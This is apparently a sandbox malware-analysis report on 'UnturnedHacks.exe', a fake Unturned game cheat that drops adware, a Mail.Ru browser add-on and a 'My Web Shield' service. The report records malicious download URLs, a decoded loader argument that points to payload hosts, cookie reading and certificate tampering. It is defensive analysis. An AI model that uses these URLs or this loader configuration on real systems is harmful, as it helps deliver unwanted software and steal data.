File name: UnturnedHacks.exe

Full analysis: https://app.any.run/tasks/109bc6e4-348c-4b43-89e1-94ace1a2f901
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: May 24, 2019, 22:18:11
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: adware, trojan, loader, pup
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386, for MS Windows, PECompact2 compressed
MD5: 1CBD0D0C7AE0D69A5EBEEF1E81062B1C
SHA1: 70D7D2CC244B736D896A9E1F8057526EAA62EB50
SHA256: DE3DB26B1484C6282A07C2BC2D553A55F57B807FA41BFFFEBC158D9A7BAD353B
SSDEEP: 49152:Tcl+6hQy8YfpY6qDfw7zu/cL2xqO5BiSwdcr7NgGb3E+y:TcY6hwYfp5L7K/LkO5B3wdc7DLty

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • wWUxRYVNi.exe (PID: 332)
      • w52e3e2e5bc44.exe (PID: 1240)
      • w283bb2c636d8.exe (PID: 3716)
      • UnturnedHacks.exe (PID: 2800)
      • UnturnedHacks.exe (PID: 3584)
      • mweshield.exe (PID: 3696)
      • mweshieldup.exe (PID: 3156)
    • Changes the autorun value in the registry

      • w52e3e2e5bc44.exe (PID: 1240)
    • MAILRU was detected

      • w52e3e2e5bc44.exe (PID: 1240)
    • Downloads executable files from the Internet

      • wWUxRYVNi.exe (PID: 332)
    • Changes settings of System certificates

      • w52e3e2e5bc44.exe (PID: 1240)
      • UnturnedHacks.exe (PID: 3584)
    • Connects to CnC server

      • w52e3e2e5bc44.exe (PID: 1240)
    • Registers / Runs the DLL via REGSVR32.EXE

      • w52e3e2e5bc44.exe (PID: 1240)
    • Changes Windows auto-update feature

      • w52e3e2e5bc44.exe (PID: 1240)
    • Loads dropped or rewritten executable

      • mweshield.exe (PID: 3696)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • UnturnedHacks.exe (PID: 3048)
      • wWUxRYVNi.exe (PID: 332)
      • w52e3e2e5bc44.exe (PID: 1240)
      • w283bb2c636d8.exe (PID: 3716)
      • regsvr32.exe (PID: 2604)
    • Reads CPU info

      • wWUxRYVNi.exe (PID: 332)
    • Reads Environment values

      • wWUxRYVNi.exe (PID: 332)
    • Low-level read access rights to disk partition

      • wWUxRYVNi.exe (PID: 332)
    • Creates files in the program directory

      • w52e3e2e5bc44.exe (PID: 1240)
      • w283bb2c636d8.exe (PID: 3716)
    • Adds / modifies Windows certificates

      • w52e3e2e5bc44.exe (PID: 1240)
      • UnturnedHacks.exe (PID: 3584)
    • Reads the cookies of Google Chrome

      • w52e3e2e5bc44.exe (PID: 1240)
    • Reads the cookies of Mozilla Firefox

      • w52e3e2e5bc44.exe (PID: 1240)
    • Creates files in the user directory

      • w52e3e2e5bc44.exe (PID: 1240)
      • UnturnedHacks.exe (PID: 3584)
    • Searches for installed software

      • wWUxRYVNi.exe (PID: 332)
    • Changes the started page of IE

      • w52e3e2e5bc44.exe (PID: 1240)
    • Creates files in the Windows directory

      • w283bb2c636d8.exe (PID: 3716)
      • w52e3e2e5bc44.exe (PID: 1240)
    • Creates a software uninstall entry

      • w283bb2c636d8.exe (PID: 3716)
    • Creates COM task schedule object

      • regsvr32.exe (PID: 2604)
    • Creates files in the driver directory

      • w283bb2c636d8.exe (PID: 3716)
    • Creates or modifies windows services

      • w283bb2c636d8.exe (PID: 3716)
  • INFO

    • Manual execution by user

      • UnturnedHacks.exe (PID: 3584)
      • UnturnedHacks.exe (PID: 2800)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 EXE PECompact compressed (v2.x) (50.1)
.exe | Win32 EXE PECompact compressed (generic) (35.2)
.dll | Win32 Dynamic Link Library (generic) (5.5)
.exe | Win32 Executable (generic) (3.8)
.exe | Win16/32 Executable Delphi generic (1.7)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2019:04:08 17:55:21+02:00
PEType: PE32
LinkerVersion: 2.25
CodeSize: 888320
InitializedDataSize: 1650688
UninitializedDataSize: -
EntryPoint: 0xda7f4
OSVersion: 5
ImageVersion: -
SubsystemVersion: 5
Subsystem: Windows GUI

Summary

Architecture: IMAGE_FILE_MACHINE_I386
Subsystem: IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date: 08-Apr-2019 15:55:21

DOS Header

Magic number: MZ
Bytes on last page of file: 0x0050
Pages in file: 0x0002
Relocations: 0x0000
Size of header: 0x0004
Min extra paragraphs: 0x000F
Max extra paragraphs: 0xFFFF
Initial SS value: 0x0000
Initial SP value: 0x00B8
Checksum: 0x0000
Initial IP value: 0x0000
Initial CS value: 0x0000
Overlay number: 0x001A
OEM identifier: 0x0000
OEM information: 0x0000
Address of NE header: 0x00000100

PE Headers

Signature: PE
Machine: IMAGE_FILE_MACHINE_I386
Number of sections: 2
Time date stamp: 08-Apr-2019 15:55:21
Pointer to Symbol Table: 0x00000000
Number of symbols: 0
Size of Optional Header: 0x00E0
Characteristics:
  • IMAGE_FILE_32BIT_MACHINE
  • IMAGE_FILE_BYTES_REVERSED_HI
  • IMAGE_FILE_BYTES_REVERSED_LO
  • IMAGE_FILE_EXECUTABLE_IMAGE
  • IMAGE_FILE_LINE_NUMS_STRIPPED
  • IMAGE_FILE_LOCAL_SYMS_STRIPPED

Sections

Name | Virtual Address | Virtual Size | Raw Size | Characteristics | Entropy
.text | 0x00001000 | 0x00278000 | 0x0019D600 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 7.99988
.rsrc | 0x00279000 | 0x0000B000 | 0x0000AE00 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 4.33088

Imports

advapi32.dll
kernel32.dll
netapi32.dll
oleaut32.dll
shell32.dll
user32.dll
version.dll
No data.
All screenshots are available in the full report
Total processes: 53
Monitored processes: 10
Malicious processes: 4
Suspicious processes: 2

Behavior graph

Interactive graph available in the full report. Nodes: unturnedhacks.exe (no specs), unturnedhacks.exe, wwuxryvni.exe, w52e3e2e5bc44.exe (#MAILRU), w283bb2c636d8.exe, unturnedhacks.exe (no specs), unturnedhacks.exe, regsvr32.exe, mweshield.exe (no specs), mweshieldup.exe (no specs); edges are labelled "drop and start" and "start".

Process information

PID | CMD | Path | Parent process

PID 3456
CMD: "C:\Users\admin\AppData\Local\Temp\UnturnedHacks.exe"
Path: C:\Users\admin\AppData\Local\Temp\UnturnedHacks.exe
Parent process: explorer.exe
User: admin
Integrity Level: MEDIUM
Exit code: 3221226540 (0xC000042C, STATUS_ELEVATION_REQUIRED)

PID 3048
CMD: "C:\Users\admin\AppData\Local\Temp\UnturnedHacks.exe"
Path: C:\Users\admin\AppData\Local\Temp\UnturnedHacks.exe
Parent process: explorer.exe
User: admin
Integrity Level: HIGH
Exit code: 0

PID 332
CMD: "C:\Users\admin\AppData\Local\Temp\MyDiskPro\wWUxRYVNi.exe" TEw9aHR0cDovL215ZC5zdS9kLypOTj1VbnR1cm5lZEhhY2tzLmV4ZSpGRj0xMjUwMCpBUEk9KlNJWkU9MTExNzY5NipNVT1odHRwOi8vbWZpbGUuc3BhY2UvbC8qU1U9TXlEaXNrLnBybyo=
(the base64 argument decodes to: LL=http://myd.su/d/*NN=UnturnedHacks.exe*FF=12500*API=*SIZE=1117696*MU=http://mfile.space/l/*SU=MyDisk.pro*)
Path: C:\Users\admin\AppData\Local\Temp\MyDiskPro\wWUxRYVNi.exe
Parent process: UnturnedHacks.exe
User: admin
Company: MyDisk.Pro
Integrity Level: HIGH
Description: MyDisk.Pro
Version: 1.0.0.0

PID 1240
CMD: "C:\Users\admin\AppData\Local\Temp\w52e3e2e5bc44.exe" --silent --install_browser_class=0 --pay_browser_class=0 "--rfr=hp.1:834408,dse.1:811570,vbm.1:811580,pult.1:811580,hp.2:834423,dse.2:811610,vbm.2:811620,pult.2:811620,any:811550,any.2:811590" "--install_callback=http://razornow.info/api_v2/callback/?guid (command line truncated in the report)
Path: C:\Users\admin\AppData\Local\Temp\w52e3e2e5bc44.exe
Parent process: wWUxRYVNi.exe
User: admin
Integrity Level: HIGH
Description: sputnik
Exit code: 3221225547 (0xC000004B)
Version: 5.1.0.194

PID 3716
CMD: "C:\Users\admin\AppData\Local\Temp\w283bb2c636d8.exe" mode=s siteid=15106 campaignid=1 sourceid=106
Path: C:\Users\admin\AppData\Local\Temp\w283bb2c636d8.exe
Parent process: wWUxRYVNi.exe
User: admin
Company: "My Web Shield"
Integrity Level: HIGH
Description: My Web Shield Installation File
Version: 3.0.0.0

PID 2800
CMD: "C:\Users\admin\Desktop\UnturnedHacks.exe"
Path: C:\Users\admin\Desktop\UnturnedHacks.exe
Parent process: explorer.exe
User: admin
Company: VimeWin
Integrity Level: MEDIUM
Description: VimeWin
Exit code: 3221226540 (0xC000042C, STATUS_ELEVATION_REQUIRED)
Version: 1.0.0.0

PID 3584
CMD: "C:\Users\admin\Desktop\UnturnedHacks.exe"
Path: C:\Users\admin\Desktop\UnturnedHacks.exe
Parent process: explorer.exe
User: admin
Company: VimeWin
Integrity Level: HIGH
Description: VimeWin
Version: 1.0.0.0

PID 2604
CMD: "C:\Windows\System32\regsvr32.exe" /s "C:\Users\admin\AppData\Local\Mail.Ru\Sputnik\ie_addon_dll.dll"
Path: C:\Windows\System32\regsvr32.exe
Parent process: w52e3e2e5bc44.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Microsoft(C) Register Server
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID 3696
CMD: "C:\Program Files\My Web Shield\mweshield.exe" /Service
Path: C:\Program Files\My Web Shield\mweshield.exe
Parent process: w283bb2c636d8.exe
User: admin
Company: "My Web Shield"
Integrity Level: HIGH
Description: My Web Shield Sentinel
Exit code: 0
Version: 3.0.0.0

PID 3156
CMD: "C:\Program Files\My Web Shield\mweshieldup.exe" /Service
Path: C:\Program Files\My Web Shield\mweshieldup.exe
Parent process: w283bb2c636d8.exe
User: admin
Company: "My Web Shield"
Integrity Level: HIGH
Description: My Web Shield Consolidator
Version: 3.0.0.0
Total events: 2 573
Read events: 1 660
Write events: 0
Delete events: 0

Modification events: No data

Executable files: 33
Suspicious files: 18
Text files: 77
Unknown types: 8

Dropped files

PID | Process | Filename | Type
1240 | w52e3e2e5bc44.exe | C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\cookies.sqlite-shm | -
1240 | w52e3e2e5bc44.exe | C:\Users\admin\AppData\Local\Temp\b693-cce2-78a4-f80d\MailRu.ico | -
1240 | w52e3e2e5bc44.exe | C:\Users\admin\AppData\Local\Temp\45e5-dca1-60d1-e028\GoMailRu.ico | -
332 | wWUxRYVNi.exe | C:\Users\admin\AppData\Local\Temp\TMP48F9.tmp | -
1240 | w52e3e2e5bc44.exe | C:\ProgramData\Mail.Ru\Id | text
  MD5: 7853DD01A22D556EC4E67A9A601B469F
  SHA256: EE0A9CE336AD917BA931D6D0B57573990A6DB4841CC1C1248BD0AD71E3146E66
1240 | w52e3e2e5bc44.exe | C:\Users\admin\AppData\Local\Mail.Ru\Sputnik\GoMailRu.ico | image
  MD5: ED62B573B9FF118E3EC726D78C5A099F
  SHA256: D8AE22194708322B6CA7C8F5686C85D41EAF847A804657ADEEF6ABCAB74B3270
3048 | UnturnedHacks.exe | C:\Users\admin\AppData\Local\Temp\MyDiskPro\wWUxRYVNi.exe | executable
  MD5: 21DDD0E26423B9FA20C27E80362AE065
  SHA256: 2634CEFA72A4514435DC66FCBE8D0A6B857760E70B8038058B206C6FE0BFB51B
1240 | w52e3e2e5bc44.exe | C:\Users\admin\Favorites\Искать в Интернете.url | text
  MD5: EB08378217B4A9D27F46FA00527D778B
  SHA256: B0C3586271724BE93C4BA4AF3D9A7DF05462F76B603DD7EF7E5BA4448BB7C244
1240 | w52e3e2e5bc44.exe | C:\Users\admin\AppData\Local\Mail.Ru\Tmp\DeferredTasks\metadata | binary
  MD5: C4C6E98DD42CC8853DF86F284FB97D50
  SHA256: 31DAB4984A707675868084F10BB8A64CA1ED041251164FBB0D9AED9792A3DA3D
1240 | w52e3e2e5bc44.exe | C:\Users\admin\Links\Искать в Интернете.url | text
  MD5: B72245103E7C3A59C85440E20317135D
  SHA256: 75CF82E4581C060A4663B6D249AB3DE840F66E0E97BBABFE5190E86AC1B72AEA
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 41
TCP/UDP connections: 54
DNS requests: 15
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | CN | Type | Size | Reputation (URL on the following line)

1240 | w52e3e2e5bc44.exe | GET | 204 | 217.69.139.245:80 | RU | - | - | suspicious
  URL: http://mrds.mail.ru/update/2/version.txt?type=install&bgn=1&standalone=1&masterid=%7BF87078E8-BC67-4E9E-8BFA-84B0EB6FFFB5%7D&user_id=%7B23631B68-8767-4904-9FC0-C789C1D10BA4%7D&osver=7&osbit=32&osvernum=6.1&ossp=Service%20Pack%201&uac=1&admin=1&ver=5.1.0.194&mailru_guard=0&mailru_updater=0&comp_mem=3583&tool_mem=7&elapsed_time=0&mr_service=0&os=win6.1&tool=sputnik&GUID=%7B89058F17-6404-4726-A244-A2A3EF950E2F%7D&common_rfr=811550&install_id=%7B89058F17-6404-4726-A244-A2A3EF950E2F%7D&rfr_rules=hp.1%3A834408%2Cdse.1%3A811570%2Chpdse.1%3A811570%2Cvbm.1%3A811580%2Cpult.1%3A811580%2Chp.2%3A834423%2Cdse.2%3A811610%2Chpdse.2%3A811610%2Cvbm.2%3A811620%2Cpult.2%3A811620%2Cany%3A811550%2Cany.2%3A811590

1240 | w52e3e2e5bc44.exe | GET | - | 217.69.139.245:80 | RU | - | - | suspicious
  URL: http://mrds.mail.ru/update/2/version.txt?type=setup_unit&id=ie_gomailru&event=done&masterid=%7BF87078E8-BC67-4E9E-8BFA-84B0EB6FFFB5%7D&user_id=%7B23631B68-8767-4904-9FC0-C789C1D10BA4%7D&osver=7&osbit=32&osvernum=6.1&ossp=Service%20Pack%201&uac=1&admin=1&ver=5.1.0.194&mailru_guard=0&mailru_updater=0&comp_mem=3583&tool_mem=13&elapsed_time=3&mr_service=0&os=win6.1&tool=sputnik&GUID=%7B89058F17-6404-4726-A244-A2A3EF950E2F%7D&common_rfr=811550&install_id=%7B89058F17-6404-4726-A244-A2A3EF950E2F%7D&rfr_rules=hp.1%3A834408%2Cdse.1%3A811570%2Chpdse.1%3A811570%2Cvbm.1%3A811580%2Cpult.1%3A811580%2Chp.2%3A834423%2Cdse.2%3A811610%2Chpdse.2%3A811610%2Cvbm.2%3A811620%2Cpult.2%3A811620%2Cany%3A811550%2Cany.2%3A811590

1240 | w52e3e2e5bc44.exe | GET | 204 | 217.69.139.245:80 | RU | - | - | suspicious
  URL: http://mrds.mail.ru/update/2/version.txt?type=spparams&raw=--silent%20--install_browser_class%3D0%20--pay_browser_class%3D0%20%22--rfr%3Dhp.1%3A834408%2Cdse.1%3A811570%2Cvbm.1%3A811580%2Cpult.1%3A811580%2Chp.2%3A834423%2Cdse.2%3A811610%2Cvbm.2%3A811620%2Cpult.2%3A811620%2Cany%3A811550%2Cany.2%3A811590%22%20%22--install_callback%3Dhttp%3A%2F%2Frazornow.info%2Fapi_v2%2Fcallback%2F%3Fguid&masterid=%7BF87078E8-BC67-4E9E-8BFA-84B0EB6FFFB5%7D&user_id=%7B23631B68-8767-4904-9FC0-C789C1D10BA4%7D&osver=7&osbit=32&osvernum=6.1&ossp=Service%20Pack%201&uac=1&admin=1&ver=5.1.0.194&mailru_guard=0&mailru_updater=0&comp_mem=3583&tool_mem=7&elapsed_time=0&mr_service=0&os=win6.1&tool=sputnik&GUID=%7B89058F17-6404-4726-A244-A2A3EF950E2F%7D&common_rfr=811550&install_id=%7B89058F17-6404-4726-A244-A2A3EF950E2F%7D&rfr_rules=hp.1%3A834408%2Cdse.1%3A811570%2Chpdse.1%3A811570%2Cvbm.1%3A811580%2Cpult.1%3A811580%2Chp.2%3A834423%2Cdse.2%3A811610%2Chpdse.2%3A811610%2Cvbm.2%3A811620%2Cpult.2%3A811620%2Cany%3A811550%2Cany.2%3A811590

332 | wWUxRYVNi.exe | GET | 200 | 104.24.116.68:80 | US | executable | 623 Kb | malicious
  URL: http://myd.su/files/advertising/f47d0ad31c4c49061b9e505593e3db98.exe

1240 | w52e3e2e5bc44.exe | GET | - | 217.69.139.245:80 | RU | - | - | suspicious
  URL: http://mrds.mail.ru/update/2/version.txt?type=setup_unit&id=fav_gomailru&event=done&masterid=%7BF87078E8-BC67-4E9E-8BFA-84B0EB6FFFB5%7D&user_id=%7B23631B68-8767-4904-9FC0-C789C1D10BA4%7D&osver=7&osbit=32&osvernum=6.1&ossp=Service%20Pack%201&uac=1&admin=1&ver=5.1.0.194&mailru_guard=0&mailru_updater=0&comp_mem=3583&tool_mem=13&elapsed_time=3&mr_service=0&os=win6.1&tool=sputnik&GUID=%7B89058F17-6404-4726-A244-A2A3EF950E2F%7D&common_rfr=811550&install_id=%7B89058F17-6404-4726-A244-A2A3EF950E2F%7D&rfr_rules=hp.1%3A834408%2Cdse.1%3A811570%2Chpdse.1%3A811570%2Cvbm.1%3A811580%2Cpult.1%3A811580%2Chp.2%3A834423%2Cdse.2%3A811610%2Chpdse.2%3A811610%2Cvbm.2%3A811620%2Cpult.2%3A811620%2Cany%3A811550%2Cany.2%3A811590

1240 | w52e3e2e5bc44.exe | GET | 204 | 217.69.139.245:80 | RU | - | - | suspicious
  URL: http://mrds.mail.ru/update/2/version.txt?type=setup_unit&id=taskbar_mailru&event=done&masterid=%7BF87078E8-BC67-4E9E-8BFA-84B0EB6FFFB5%7D&user_id=%7B23631B68-8767-4904-9FC0-C789C1D10BA4%7D&osver=7&osbit=32&osvernum=6.1&ossp=Service%20Pack%201&uac=1&admin=1&ver=5.1.0.194&mailru_guard=0&mailru_updater=0&comp_mem=3583&tool_mem=13&elapsed_time=3&mr_service=0&os=win6.1&tool=sputnik&GUID=%7B89058F17-6404-4726-A244-A2A3EF950E2F%7D&common_rfr=811550&install_id=%7B89058F17-6404-4726-A244-A2A3EF950E2F%7D&rfr_rules=hp.1%3A834408%2Cdse.1%3A811570%2Chpdse.1%3A811570%2Cvbm.1%3A811580%2Cpult.1%3A811580%2Chp.2%3A834423%2Cdse.2%3A811610%2Chpdse.2%3A811610%2Cvbm.2%3A811620%2Cpult.2%3A811620%2Cany%3A811550%2Cany.2%3A811590

1240 | w52e3e2e5bc44.exe | GET | 204 | 217.69.139.245:80 | RU | - | - | suspicious
  URL: http://mrds.mail.ru/update/2/version.txt?type=sp_prep&time=15466&masterid=%7BF87078E8-BC67-4E9E-8BFA-84B0EB6FFFB5%7D&user_id=%7B23631B68-8767-4904-9FC0-C789C1D10BA4%7D&osver=7&osbit=32&osvernum=6.1&ossp=Service%20Pack%201&uac=1&admin=1&ver=5.1.0.194&mailru_guard=0&mailru_updater=0&comp_mem=3583&tool_mem=14&elapsed_time=19&mr_service=0&os=win6.1&tool=sputnik&GUID=%7B89058F17-6404-4726-A244-A2A3EF950E2F%7D&common_rfr=811550&install_id=%7B89058F17-6404-4726-A244-A2A3EF950E2F%7D&rfr_rules=hp.1%3A834408%2Cdse.1%3A811570%2Chpdse.1%3A811570%2Cvbm.1%3A811580%2Cpult.1%3A811580%2Chp.2%3A834423%2Cdse.2%3A811610%2Chpdse.2%3A811610%2Cvbm.2%3A811620%2Cpult.2%3A811620%2Cany%3A811550%2Cany.2%3A811590

1240 | w52e3e2e5bc44.exe | GET | - | 217.69.139.245:80 | RU | - | - | suspicious
  URL: http://mrds.mail.ru/update/2/version.txt?type=spnative_run&id=mrupdater&event=error&error=193&masterid=%7BF87078E8-BC67-4E9E-8BFA-84B0EB6FFFB5%7D&user_id=%7B23631B68-8767-4904-9FC0-C789C1D10BA4%7D&osver=7&osbit=32&osvernum=6.1&ossp=Service%20Pack%201&uac=1&admin=1&ver=5.1.0.194&mailru_guard=0&mailru_updater=0&comp_mem=3583&tool_mem=14&elapsed_time=15&mr_service=0&os=win6.1&tool=sputnik&GUID=%7B89058F17-6404-4726-A244-A2A3EF950E2F%7D&common_rfr=811550&install_id=%7B89058F17-6404-4726-A244-A2A3EF950E2F%7D&rfr_rules=hp.1%3A834408%2Cdse.1%3A811570%2Chpdse.1%3A811570%2Cvbm.1%3A811580%2Cpult.1%3A811580%2Chp.2%3A834423%2Cdse.2%3A811610%2Chpdse.2%3A811610%2Cvbm.2%3A811620%2Cpult.2%3A811620%2Cany%3A811550%2Cany.2%3A811590

332 | wWUxRYVNi.exe | GET | 200 | 104.24.116.68:80 | US | executable | 1.07 Mb | malicious
  URL: http://myd.su/d/eyJmaWQiOiIyZjA2NmJmMCIsImtleSI6ImVhYmU2MjQ3NmE0NDg5NCJ9
  (the base64 path segment decodes to {"fid":"2f066bf0","key":"eabe62476a44894"})

332 | wWUxRYVNi.exe | POST | - | 104.27.161.171:80 | US | - | - | malicious
  URL: http://mfile.space/l/

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
1240 | w52e3e2e5bc44.exe | 217.69.139.122:443 | conserv.go.mail.ru | Limited liability company Mail.Ru | RU | unknown
- | - | 217.69.139.245:80 | mrds.mail.ru | Limited liability company Mail.Ru | RU | malicious
1240 | w52e3e2e5bc44.exe | 217.69.139.247:443 | xmlbinupdate.mail.ru | Limited liability company Mail.Ru | RU | malicious
1240 | w52e3e2e5bc44.exe | 217.69.139.245:80 | mrds.mail.ru | Limited liability company Mail.Ru | RU | malicious
332 | wWUxRYVNi.exe | 104.27.161.171:80 | mfile.space | Cloudflare Inc | US | shared
1240 | w52e3e2e5bc44.exe | 94.100.180.110:443 | mailruupdater.cdnmail.ru | Limited liability company Mail.Ru | RU | suspicious
1240 | w52e3e2e5bc44.exe | 217.69.139.245:443 | mrds.mail.ru | Limited liability company Mail.Ru | RU | malicious
332 | wWUxRYVNi.exe | 104.24.116.68:80 | myd.su | Cloudflare Inc | US | shared
1240 | w52e3e2e5bc44.exe | 217.69.139.110:443 | xtnmailru.cdnmail.ru | Limited liability company Mail.Ru | RU | malicious
3716 | w283bb2c636d8.exe | 88.208.5.120:80 | mywebshield-ww1.com | DataWeb Global Group B.V. | NL | malicious

DNS requests

Domain | IP | Reputation
mfile.space | 104.27.161.171, 104.27.160.171 | malicious
myd.su | 104.24.116.68, 104.24.117.68 | malicious
xmlbinupdate.mail.ru | 217.69.139.247 | shared
conserv.go.mail.ru | 217.69.139.122 | unknown
mrds.mail.ru | 217.69.139.245 | suspicious
mailruupdater.cdnmail.ru | 94.100.180.110 | unknown
xtnmailru.cdnmail.ru | 217.69.139.110 | unknown
mywebshield-ww1.com | 88.208.5.120 | malicious
getmywebshield.org | 88.208.5.119 | unknown
gosoftdl.mail.ru | 94.100.180.110 | shared

Threats

PID | Process | Class | Message
332 | wWUxRYVNi.exe | Misc activity | ADWARE [PTsecurity] Win32.SoftPulse.gikv
- | - | Potentially Bad Traffic | ET DNS Query for .su TLD (Soviet Union) Often Malware Related
332 | wWUxRYVNi.exe | Potentially Bad Traffic | ET POLICY HTTP Request to .su TLD (Soviet Union) Often Malware Related
332 | wWUxRYVNi.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP
332 | wWUxRYVNi.exe | A Network Trojan was detected | ET TROJAN HTTP Executable Download from suspicious domain with direct request/fake browser (multiple families)
332 | wWUxRYVNi.exe | Potentially Bad Traffic | ET POLICY HTTP Request to .su TLD (Soviet Union) Often Malware Related
332 | wWUxRYVNi.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP
332 | wWUxRYVNi.exe | A Network Trojan was detected | ET TROJAN HTTP Executable Download from suspicious domain with direct request/fake browser (multiple families)
332 | wWUxRYVNi.exe | Misc activity | ET INFO EXE - Served Attached HTTP
332 | wWUxRYVNi.exe | Potentially Bad Traffic | ET POLICY HTTP Request to .su TLD (Soviet Union) Often Malware Related
13 ETPRO signatures available at the full report
No debug info